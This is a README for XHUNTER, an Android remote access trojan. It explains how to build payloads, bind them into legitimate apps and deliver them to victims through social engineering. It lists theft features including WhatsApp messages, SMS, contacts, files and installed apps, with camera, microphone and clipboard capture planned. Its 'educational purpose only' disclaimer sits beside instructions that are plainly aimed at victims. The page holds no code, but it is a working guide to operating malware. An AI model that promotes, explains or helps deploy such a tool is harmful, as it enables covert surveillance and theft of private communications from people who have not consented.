XHUNTER

Android Penetration Tool [ RAT for Android ]


View Release · Report Bug · Request Feature

balance_scale Legal Disclaimer: For Educational Purpose Only

Usage of XHUNTER for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Use Responsibly!

About The Project

There are many great Android RAT available on GitHub; however, I didn't find one that really suited my needs so I created this enhanced one. I want to create a RAT so amazing that it'll be the last one you ever need -- I think this is it.

Here's why:

  • The main reason, I did started on this project is to simplify the problem of connection between attacker and victim.[Eliminated all port forwarding and over the internet issues]
  • Followed by, I wanted to have control over victims using smartphoneiphone with a simple UI app rather then a pccomputer or remote virtual machinedesktop_computer with command line interface.

Of course, no one will serve all features since your needs may be different. So I'll be adding more in the near future. You may also suggest changes by forking this repo and creating a pull request or opening an issue.grinning

(back to top)

Getting Started

Prerequisites

Before we proceed one must have:

  • Android Device
  • Good Internet Connection

Installation and Usage

In order to use tool we must :

  • Setup your xhunter-server from here
  1. Download the latest version xhunter_vX.X.apk from release section: here
  2. Once downloaded, Install/Open the app in your device. If you face Unknown Source error see

  1. Once installed, Open app and select Build Payloads option and select any desired option to build payload :
  • Build WhatsApp Payload (use this option/payload to enable whatsapp message feature)
  • Build + Bind Payload (use this option/payload to bind xhunter malicious code with legitimate apk)

  1. Send the payload to the victim (use social engineering or other method)

  1. Once victim uses the payload you will get a active session of victim device to your device

In order to connect/listen to your victim you must :

 

video.mp4

 


 

  1. Select Start Listening option to listen for the active connection

  2. Once started listening you can select active victim device from device list and can access all the listed features below

(back to top)

Features

  • white_check_mark Real time
  • white_check_mark receive any file or folder from target device
  • white_check_mark bind with other apps
  • white_check_mark fetch all whatsapp messages
  • white_check_mark fetch all whatsapp contacts
  • white_check_mark receive all target message
  • white_check_mark send sms with target device to any number
  • white_check_mark recive all target contacts
  • white_check_mark receive list of all installedd apps in target device
  • hourglass_flowing_sand delete any file or folder from target device
  • hourglass_flowing_sand capture main and front camera
  • hourglass_flowing_sand capture microphone
  • hourglass_flowing_sand receive last clipboard text

Contributing

Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.

If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

(back to top)